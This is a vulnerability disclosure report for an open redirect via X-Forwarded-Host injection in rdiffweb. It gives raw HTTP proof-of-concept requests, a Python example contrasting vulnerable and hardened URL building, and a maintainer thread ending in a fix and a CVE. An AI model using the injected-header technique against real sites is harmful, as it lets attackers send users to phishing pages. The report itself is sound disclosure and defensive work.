Open Redirect using Host header Injection in ikus060/rdiffweb

Valid

Reported on

Nov 27th 2022


Description

A web server commonly hosts several web applications on the same IP address, referring to each application via the virtual host. In an incoming HTTP request, web servers often dispatch the request to the target virtual host based on the value supplied in the Host header. Without proper validation of the header value, the attacker can supply invalid input to cause the web server to:

- Dispatch requests to the first virtual host on the list.
- Perform a redirect to an attacker-controlled domain.
- Perform web cache poisoning.
- Manipulate password reset functionality.
- Allow access to virtual hosts that were not intended to be externally accessible.

Proof of Concept

1. Go to https://rdiffweb-demo.ikus-soft.com and log in using the credentials.
2. After logging into the website, refresh the page and intercept the request using Burp Suite. The request will look something like this:

```http
GET / HTTP/1.1
Host: rdiffweb-demo.ikus-soft.com
Cookie: session_id=38522b2736a9c2f012c30962b9ef4cc772326a23
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close
```

3. Add the header `X-Forwarded-Host: bing.com` to the request and send it:

```http
GET / HTTP/1.1
Host: rdiffweb-demo.ikus-soft.com
X-Forwarded-Host: bing.com
Cookie: session_id=38522b2736a9c2f012c30962b9ef4cc772326a23
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close
```

4. Search for bing.com in the response and you will see that the paths have changed to bing.com.
5. Right-click and select "Show response in browser". Copy the URL and paste it into your browser.
6. Now click on any tab such as Repositories, Status or Admin area and you will be redirected to bing.com.

Proof of Concept screenshots:

![Screenshot1](https://drive.google.com/file/d/1TvAl_Fj4qL0ldl7uzbfQagiOFUdsnuXB/view?usp=sharing)
![Screenshot2](https://drive.google.com/file/d/1jBke7umSQlYKp1zYVFuKd6yyl7DDdr4l/view?usp=sharing)
![Screenshot3](https://drive.google.com/file/d/1W2KN_d7EFWYl3TH4ptUE-AGZQq6OIKOf/view?usp=sharing)

Impact

If the application does not validate untrusted user input, an attacker could supply a URL that redirects an unsuspecting victim from a legitimate domain to an attacker's phishing site and perform actions such as stealing credentials.
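To show the pattern behind this report and the fix the maintainer describes (ignore X-Forwarded-Host and rely on Host alone), the following Python is an added example written for this page, not rdiffweb's own code; the allowlist, function names and header dictionaries are constructed assumptions.

```python
from urllib.parse import urlunsplit

# Hostnames this deployment is allowed to answer for (constructed allowlist).
ALLOWED_HOSTS = {"rdiffweb-demo.ikus-soft.com"}


def _hostname(host_header):
    """Strip an optional :port from a Host value and normalise case."""
    host = host_header.strip().lower()
    if host.startswith("["):  # IPv6 literal such as [::1]:8080
        return host.split("]", 1)[0] + "]"
    return host.rsplit(":", 1)[0] if ":" in host else host


def base_url_trusting_forwarded_host(headers, path="/"):
    """Vulnerable pattern: X-Forwarded-Host wins when building absolute URLs,
    so a client-supplied header ends up in every generated link."""
    host = headers.get("X-Forwarded-Host") or headers.get("Host")
    scheme = headers.get("X-Forwarded-Proto", "https")
    return urlunsplit((scheme, host, path, "", ""))


def base_url_host_only(headers, path="/"):
    """Hardened pattern: ignore X-Forwarded-Host entirely and accept Host only
    when it names a host this application is configured to serve."""
    host = headers.get("Host", "")
    if _hostname(host) not in ALLOWED_HOSTS:
        raise ValueError(f"untrusted Host header: {host!r}")
    return urlunsplit(("https", host, path, "", ""))


def forwarded_host_mismatch(headers):
    """Detection helper: True when a request carries an X-Forwarded-Host
    naming a host outside the allowlist (worth logging at the edge)."""
    xfh = headers.get("X-Forwarded-Host")
    return xfh is not None and _hostname(xfh) not in ALLOWED_HOSTS


# Constructed headers mirroring the report's two requests (not captured traffic).
REQUEST_NORMAL = {"Host": "rdiffweb-demo.ikus-soft.com"}
REQUEST_INJECTED = {"Host": "rdiffweb-demo.ikus-soft.com",
                    "X-Forwarded-Host": "bing.com"}

if __name__ == "__main__":
    print(base_url_trusting_forwarded_host(REQUEST_INJECTED, "/admin/"))  # https://bing.com/admin/
    print(base_url_host_only(REQUEST_INJECTED, "/admin/"))  # https://rdiffweb-demo.ikus-soft.com/admin/
    print(forwarded_host_mismatch(REQUEST_INJECTED))  # True
```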

References

We are processing your report and will contact the ikus060/rdiffweb team within 24 hours. a month ago
We have contacted a member of the ikus060/rdiffweb team and are waiting to hear back a month ago
Anishka Shukla
a month ago

Researcher


Any updates on it?

Patrik Dufresne validated this vulnerability a month ago
Anishka Shukla has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Patrik Dufresne
a month ago

Maintainer


Next release should ignore X-Forwarded-Host and only rely on Host header

Anishka Shukla
a month ago

Researcher


Can you please assign CVE on this?

Patrik Dufresne
a month ago

Maintainer


I believe CVEs are now assigned when fixed.

Anishka Shukla
a month ago

Researcher


Okay

Patrik Dufresne marked this as fixed in 2.5.4 with commit 5f8616 25 days ago
Patrik Dufresne has been awarded the fix bounty
This vulnerability has been assigned a CVE
This vulnerability is scheduled to go public on Dec 22nd 2022
Ben Harvie published this vulnerability 19 days ago